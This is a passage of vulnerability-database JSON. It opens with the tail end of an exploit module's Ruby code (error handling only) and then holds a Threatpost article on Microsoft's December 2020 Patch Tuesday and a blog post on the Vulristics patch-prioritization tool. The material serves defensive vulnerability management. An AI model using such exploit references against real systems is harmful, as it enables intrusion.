|| output.empty?\n end\n rescue Rex::TimeoutError\n vprint_warning('Time out exception: wait limit exceeded (5 sec)')\n rescue ::StandardError => e\n print_error(\"Exception: #{e.inspect}\")\n end\n\n client.response_timeout = old_timeout\n print_status('End output.')\n end\nend\n", "sourceHref": "https://0day.today/exploit/35669", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-12-08T20:30:01", "description": "Microsoft has addressed 58 CVEs (nine of them critical) for its December 2020 Patch Tuesday update. This brings the computing giant\u2019s patch tally to 1,250 for the year \u2013 well beyond 2019\u2019s 840.\n\nThis month\u2019s security bugs affect Microsoft Windows, Edge (EdgeHTML-based), ChakraCore, Microsoft Office and Office Services and Web Apps, Exchange Server, Azure DevOps, Microsoft Dynamics, Visual Studio, Azure SDK and Azure Sphere, according to the update. None are listed as publicly known or under active attack. Also, no vulnerability was assigned a CVSSv3 severity score of 9.0 or higher.\n\n## **Critical Bug Breakdown**\n\nThree of the critical flaws are found in Microsoft Exchange (CVE-2020-17117, CVE-2020-17132 and CVE-2020-17142), all allowing remote code execution (RCE). [One of these](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) occurs due to improper validation of cmdlet arguments, according to Microsoft, which doesn\u2019t provide an attack scenario but does note that the attacker needs be authenticated with privileges.\n\n\u201cThis indicates that if you take over someone\u2019s mailbox, you can take over the entire Exchange server,\u201d according to Dustin Childs at Trend Micro\u2019s Zero Day Initiative (ZDI), writing in a [Tuesday analysis](<https://www.zerodayinitiative.com/blog/2020/12/8/the-december-2020-security-update-review>). 
\u201cWith all of the other Exchange bugs, definitely prioritize your Exchange test and deployment.\u201d\n\nAlso on the Exchange front, [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) addresses a patch bypass for CVE-2020-16875, which was reported and patched in September\u2019s Patch Tuesday release. While not critical, it\u2019s of note, Childs said.\n\nChilds also flagged [CVE-2020-17121](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17121>), one of two critical RCE bugs in Microsoft SharePoint (the other is [CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>)). Originally reported through the ZDI program, the bug could allow an authenticated user to execute arbitrary .NET code on an affected server in the context of the SharePoint Web Application service account.\n\n\u201cIn its default configuration, authenticated SharePoint users are able to create sites that provide all of the necessary permissions that are prerequisites for launching an attack,\u201d Childs explained. \u201cSimilar bugs [patched earlier this year](<https://threatpost.com/microsofts-patch-tuesday-critical-rce-bugs/159044/>) received quite a bit of attention. We suspect this one will, too.\u201d\n\nIn fact, the SharePoint CVEs should take patching priority, Immersive Labs\u2019 Kevin Breen, director of cyberthreat research, said via email. \u201cBoth are rated as critical as they have RCE, and SharePoint can be used like a watering hole inside large organizations by an attacker,\u201d he said. 
\u201cAll it takes is for a few weaponized documents to be placed for malicious code to spread across an organization.\u201d\n\nAnother critical bug of note is tracked as [CVE-2020-17095](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17095>), a Hyper-V RCE vulnerability that allows an attacker to escalate privileges from code execution in a Hyper-V guest to code execution on the Hyper-V host by passing invalid vSMB packet data. The flaw carries the highest CVSS score in the update, coming in at 8.5, since no special permissions are needed to exploit it.\n\n\u201cTo exploit this vulnerability, an adversary could run a custom application on a Hyper-V guest that would cause the Hyper-V host operating system to allow arbitrary code execution when it fails to properly validate vSMB packet data,\u201d explained Automox researcher Jay Goodman, via email. \u201cThe vulnerability is present on most builds of Windows 10 and Windows Server 2004 and forward.\u201d\n\nTwo post-authentication RCE flaws in Microsoft Dynamics 365 for Finance and Operations (on-premises) ([CVE-2020-17158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17158>) and [CVE-2020-17152](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17152>)) round out the critical patches, along with a memory-corruption issue in the Chakra Scripting Engine, which impacts the Edge browser ([CVE-2020-17131](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17131>)).\n\n\u201cOnly one [of the critical-rated updates] (surprisingly) impacts the browser,\u201d Childs said. \u201cThat patch corrects a bug within the JIT compiler. By performing actions in JavaScript, an attacker can trigger a memory-corruption condition, which leads to code execution. 
The lack of browser updates could also be a conscious decision by Microsoft to ensure a bad patch for a browser does not disrupt online shopping during the holiday season.\u201d\n\nThough it\u2019s a lighter than usual month for the volume of patches, the steady flow of critical RCE bugs presents a great deal of risk, said Justin Knapp, researcher at Automox, via email.\n\n\u201cInstead of having to manipulate a user to click a malicious link or attachment, bad actors merely have to target an unpatched system to gain initial access, at which point a number of methods can be employed to increase access to valuable assets,\u201d he said, referring to this month\u2019s critical RCE problems. \u201cIt goes without saying that the speed at which an organization can deploy these fixes will dictate the level of risk they take on.\u201d\n\n## **Other Bugs, Patching**\n\nIn addition to the critical bugs, a full 46 of the bugs are rated as important, and three are rated moderate in severity. The important bugs include 10 Office bugs impacting Outlook, PowerPoint and Excel \u2014 for these, Office 2019 versions for Mac do not have patches yet.\n\n\u201cThis is a book-end to a year that began with Microsoft addressing 49 CVEs in January of 2020, followed by eight consecutive months with over 90 CVEs addressed. In 2020, Microsoft released patches for over 1,200 CVEs,\u201d Satnam Narang, principal research engineer, Tenable, told Threatpost.\n\nPatching may be more difficult than ever going forward. \u201cOne of the things that stands out is that Microsoft has removed a lot of the detail they usually share with such advisories,\u201d Breen said. \u201cFor me, this could lead to some issues. Patching is not as easy as just clicking an update button and security teams like to gain a deeper understanding of what they are doing. 
Instead, however, they are expected to operate with less information.\u201d\n\nElsewhere, [Adobe issued patches](<https://threatpost.com/adobe-windows-macos-critical-severity-flaws/162007/>) for flaws tied to one important-rated and three critical-severity CVEs, during its regularly scheduled December security updates.\n\n\u201cWhile lighter than usual, the most severe allow for arbitrary code execution including three critical severity CVEs and one less severe (important-rated) flaw identified,\u201d Nick Colyer, researcher from Automox said. \u201cThe holidays present unique challenges to security teams\u2019 upcoming out-of-office time and the severity of the vulnerabilities Adobe has addressed are non-trivial against those challenges. It is important to prioritize any major vulnerabilities during holidays to reduce the threat surface exposed to would-be attackers.\u201d\n", "cvss3": {}, "published": "2020-12-08T20:23:30", "type": "threatpost", "title": "Microsoft Wraps Up a Lighter Patch Tuesday for the Holidays", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-16875", "CVE-2020-17095", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17121", "CVE-2020-17131", "CVE-2020-17132", "CVE-2020-17142", "CVE-2020-17152", "CVE-2020-17158"], "modified": "2020-12-08T20:23:30", "id": "THREATPOST:02914A68EEB34D94544D5D00BF463BAC", "href": "https://threatpost.com/microsoft-patch-tuesday-holidays/162041/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-01-30T22:26:39", "description": "In this episode I would like to make a status update of my [Vulristics project](<https://github.com/leonov-av/vulristics>). For those who don't know, in this project I retrieve publicly available vulnerability data and analyze it to better understand the severity of these vulnerabilities and better prioritize them. Currently, it is mainly about Microsoft Patch Tuesday vulnerabilities, but I have plans to go further. Also in this episode I want to demonstrate the new Vulristics features on Microsoft Patch Tuesday reports for October, November and December 2020.\n\n## Patch Tuesdays Automated Data Collection\n\nFirst of all, I dealt with the annoying collecting of the data for Microsoft Patch Tuesdays reports. Previously it took pretty long time. 
I had to go to the Microsoft website and [search for CVE IDs](<https://msrc.microsoft.com/update-guide/vulnerability>). After that, I had to get the comments from various Vulnerability Management vendors' and researchers' blogs (Tenable, Qualys, Rapid7, ZDI). I wanted this to be as automated as possible. I have added some code to make CVE search requests on the Microsoft website for a date range (including the second Tuesday of the month). I also figured out how to make searches on the Vulnerability Management vendors' blogs. So, now to get a Microsoft Patch Tuesday report it's only necessary to set the year and month. \n\nSimple like this:\n \n \n import functions_report_ms_patch_tuesday\n \n functions_report_ms_patch_tuesday.make_ms_patch_tuesday_report(year=\"2020\", month=\"December\", rewrite_flag=True)\n\n## Vulristics Vulnerability Scoring (VVS)\n\nI decided that CVSS is not suitable for evaluating, sorting and comparing vulnerabilities. I needed something to automatically process hundreds of vulnerabilities every month and to highlight the most critical ones. Finally, I decided to make my own scoring - Vulristics Vulnerability Scoring (VVS). \n\nDo you know the perfect formula for counting vulnerability criticality? Well, I don't. Any scoring that I can make will be subjective and will probably change over time. But at least I can make it transparent and easily changeable, so that everyone can make their own vulnerability scoring most appropriate for a particular organization.\n\nSuch scoring should consider \n\n * CVSS Base score \n * existence of the exploit\n * exploitability of the vulnerability in the wild\n * popularity of the vulnerable software \n * type of the vulnerability\n\nExamples: \n\n2\\.  
**Elevation of Privilege** - Windows Kernel Local ([CVE-2020-17087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17087>)) - Critical [628] \ncomponent| value| weight| comment \n---|---|---|--- \nExploited in the Wild| 1.0| 18| Exploitation in the wild is mentioned at Vulners ([AttackerKB](<https://vulners.com/attackerkb/AKB:B72B19ED-8E0B-4C11-9C2D-95A25BCC42A6>) object), [AttackerKB](<https://attackerkb.com/topics/y8mmBHc710/cve-2020-17087-windows-kernel-local-privilege-escalation-0day>), [Microsoft](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17087>) \nPublic Exploit Exists| 0| 17| Public exploit is NOT found at Vulners website \nCriticality of Vulnerability Type| 0.5| 15| Elevation of Privilege \nVulnerable Product is Common| 1.0| 14| Windows component \nCVSS Base Score| 0.7| 10| NVD Vulnerability Severity Rating is High \n3\\.  **Elevation of Privilege** - Windows Print Spooler ([CVE-2020-17001](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17001>)) - Critical [614] \ncomponent| value| weight| comment \n---|---|---|--- \nExploited in the Wild| 0| 18| Exploitation in the wild is NOT found at Vulners, Microsoft and AttackerKB websites \nPublic Exploit Exists| 1.0| 17| Public exploit is found at Vulners ([Microsoft Windows Local Spooler Bypass](<https://vulners.com/PACKETSTORM/PACKETSTORM:160028>)) \nCriticality of Vulnerability Type| 0.5| 15| Elevation of Privilege \nVulnerable Product is Common| 1.0| 14| Windows component \nCVSS Base Score| 0.7| 10| NVD Vulnerability Severity Rating is High \n \n### Exploitability in The Wild and Vulners\n\nThe really interesting thing was to detect if the vulnerability is being exploited in real attacks. I made a post in my Telegram channel asking for ideas. We can't use Microsoft data directly because they do not update it after the initial vulnerability release. 
Other good sources are [AttackerKB by Rapid7](<https://attackerkb.com/>) and [US-CERT Bulletins](<https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>). \n\nI asked my friends from the Vulners team to add this feature and now you can [search for CVEs exploited in the wild](<https://vulners.com/search?query=enchantments.exploitation.wildExploited:true>) based on data from AttackerKB and US-CERT. \n\nAnd also this data is available in JSON format for the vulnerability:\n \n \n ... \n \"exploitation\": {\n \"wildExploited\": true,\n \"wildExploitedSources\": [\n {\n \"type\": \"cisa\",\n \"idList\": [\n \"CISA:2B970469D89016F563E142BE209443D8\",\n \"CISA:61F2653EF56231DB3AEC3A9E938133FE\",\n \"CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB\"\n ]\n },\n {\n \"type\": \"attackerkb\",\n \"idList\": [\n \"AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB\"\n ]\n }\n ],\n \"modified\": \"2020-12-25T13:57:26\"\n },\n ... \n \n\nI also added direct AttackerKB processing to Vulristics and some code to filter out false positives in "Exploitability in The Wild".\n\n### VM Vendor's Comments \n\nWhat about VM Vendor's Comments? Firstly I thought that the existence of the comment from the vendor should be taken into consideration when counting the vulnerability score. But then I decided that it's a bad practice because the vendors are not who makes the criticality but they help you to test your scoring.\n\nFor example, if your score shows that some vulnerability is critical and vulnerability management vendors don't mention it, this means that your scoring has some flaws or the experts of VM vendor don't understand something. \n\n## Microsoft Patch Tuesdays Q4 2020\n\nNow let's take a look at the Vulristics Microsoft Patch Tuesday reports for October, November and December 2020.\n\n### October 2020\n\n * All vulnerabilities: 87\n * Urgent: 0\n * Critical: 2\n * High: 20\n * Medium: 63\n * Low: 2\n\nIt has been an interesting month. 
\n\nMost of the VM vendors and researchers focused on "**Remote Code Execution** - Windows TCP/IP ([CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)) - High [500]", dubbed "Bad Neighbor". It affects all supported versions of Windows OS, and maybe unsupported/earlier versions of Windows as well. Tenable wrote: "According to a blog post from McAfee, Microsoft Active Protections Program (MAPP) members were provided with a test script that successfully demonstrates exploitation of this vulnerability to cause a denial of service (DoS). While the test scenario does not provide the ability to pivot to RCE, an attacker could craft a wormable exploit to achieve RCE. While an additional bug would be required to craft an exploit, it is likely that we will see proof-of-concept (PoC) code released in the near future." However, there has been no news since October.\n\nBut there is a more critical vulnerability with a public exploit "**Remote Code Execution** - Microsoft SharePoint ([CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>)) - Critical [640]". It was mentioned by all vendors, but without much emphasis.\n\nAnd the second critical vulnerability is "**Elevation of Privilege** - Windows COM Server ([CVE-2020-16916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16916>)) - Critical [628]" for which there is a flag of exploitation in the wild in AttackerKB. How much can you believe it? Well AttackerKB is a crowdsourcing platform, so possibly it can be fake.\n\nFor many other vulnerabilities (including 19 RCEs), there are no exploits or signs of exploitation in the wild. Among them, much attention has been paid to RCE in Microsoft Outlook ([CVE-2020-16947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>)). 
A quote from Tenable: "Because Outlook\u2019s Preview Pane is affected by this flaw, a user does not have to open the message in order for the vulnerability to be exploited. As Outlook is widely used for enterprise email, we highly recommend prioritizing the patching of this CVE."\n\n### November 2020\n\n * All vulnerabilities: 112\n * Urgent: 0\n * Critical: 3\n * High: 17\n * Medium: 90\n * Low: 2\n\n2 vulnerabilities were critical because there is information about them that they are Exploited in the wild. \n\nAll VM vendors initially did not notice "**Security Feature Bypass** - Kerberos KDC ([CVE-2020-17049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17049>)) - Critical [709]", only ZDI wrote that they don't understand what it is: "What security feature in Kerberos is being bypassed? What is the likelihood?". But then a post appeared with a [detailed description of the exploitation](<https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/>). \n\nThe second critical is "**Elevation of Privilege** - Windows Kernel Local ([CVE-2020-17087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17087>)) - Critical [628]". It was used to escape Google Chrome\u2019s sandbox in order to elevate privileges on the exploited system.\n\nThe third critical vulnerability "**Elevation of Privilege** - Windows Print Spooler ([CVE-2020-17001](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17001>)) - Critical [614]" has a public exploit at Vulners ([Microsoft Windows Local Spooler Bypass](<https://vulners.com/PACKETSTORM/160028>)) \n\nMost of the comments this month were about "**Remote Code Execution** - Windows Network File System ([CVE-2020-17051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17051>)) - High [513]". 
A quote from Tenable: "In a blog post by McAfee, there is speculation about combining **CVE-2020-17051** with CVE-2020-17056, a remote kernel data read vulnerability in NFS, in order to bypass address space layout randomization (ASLR), which could increase the probability of a remote exploit". But in fact, we did not see any attacks or exploits for this vulnerability.\n\nAlso worth mentioning RCEs in\n\n * Microsoft Exchange Server ([CVE-2020-17083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17083>), [CVE-2020-17084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17084>))\n * Windows Print Spooler ([CVE-2020-17042](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17042>))\n * Microsoft Excel ([CVE-2020-17019](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17019>), [CVE-2020-17064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17064>), [CVE-2020-17065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17065>), [CVE-2020-17066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17066>))\n * Microsoft SharePoint ([CVE-2020-17061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17061>))\n * Microsoft Teams ([CVE-2020-17091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17091>))\n\nBut we did not see any attacks or exploits for them either.\n\n### December 2020\n\n * All vulnerabilities: 58\n * Urgent: 0\n * Critical: 1\n * High: 23\n * Medium: 30\n * Low: 4\n\nThere were no vulnerabilities with exploits. \n\nThe critical is only "**Remote Code Execution** - Microsoft Exchange ([CVE-2020-17144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17144>)) - Critical [705]", because of AttackerKB. How realistic is this? You know, crowdsourcing. 
Rapid7: "**CVE-2020-17144** which is another remote code execution vulnerability also stemming from improper validation for cmdlet arguments, this one only affects Exchange Server 2010 SP3 and does require additional user interaction to successfully execute". Besides this, there were many other Microsoft Exchange RCEs ([CVE-2020-17117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17117>), [CVE-2020-17132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17132>), [CVE-2020-17141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17141>), [CVE-2020-17142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17142>)).\n\nOther RCEs worth mentioning were in:\n\n * Windows NTFS ([CVE-2020-17096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17096>)). Tenable: "An RCE in Windows NT File System (NTFS), the file system used in Microsoft Windows and Microsoft Windows Server. No user interaction is required to exploit this vulnerability. Depending on the attacker\u2019s position, there are a few avenues for exploitation. For an attacker that has already established a local position on the vulnerable system, executing a malicious application that exploits the flaw would result in an elevation of privileges. Alternatively, a remote attacker could exploit the flaw by sending malicious requests to a vulnerable system, so long as they could access it over the Server Message Block version 2 protocol (SMBv2). 
Successful exploitation in this context would grant the attacker arbitrary code execution".\n * Hyper-V ([CVE-2020-17095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17095>))\n * Microsoft SharePoint ([CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>), [CVE-2020-17121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17121>))\n * Microsoft Excel ([CVE-2020-17122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17122>), [CVE-2020-17123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17123>), [CVE-2020-17125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17125>), [CVE-2020-17127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17127>), [CVE-2020-17128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17128>), [CVE-2020-17129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17129>))\n\nThank you, I will be glad to know your opinion about Vulristics and how it can be further improved. 
Write to <https://t.me/avleonovchat>.\n\nFull reports are available here:\n\n * [October 2020](<http://avleonov.com/vulristics_reports/october2020_report_avleonov_comments.html>)\n * [November 2020](<http://avleonov.com/vulristics_reports/november2020_report_avleonov_comments.html>)\n * [December 2020](<http://avleonov.com/vulristics_reports/december2020_report_avleonov_comments.html>)\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-11T01:50:44", "type": "avleonov", "title": "Vulristics Vulnerability Score, Automated Data Collection and Microsoft Patch Tuesdays Q4 2020", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2020-16898", "CVE-2020-16916", "CVE-2020-16947", "CVE-2020-16952", "CVE-2020-17001", "CVE-2020-17019", "CVE-2020-17042", "CVE-2020-17049", "CVE-2020-17051", "CVE-2020-17056", "CVE-2020-17061", "CVE-2020-17064", "CVE-2020-17065", "CVE-2020-17066", "CVE-2020-17083", "CVE-2020-17084", "CVE-2020-17087", "CVE-2020-17091", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17121", "CVE-2020-17122", 
"CVE-2020-17123", "CVE-2020-17125", "CVE-2020-17127", "CVE-2020-17128", "CVE-2020-17129", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"], "modified": "2021-01-11T01:50:44", "id": "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "href": "http://feedproxy.google.com/~r/avleonov/~3/mC48TITxRfM/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}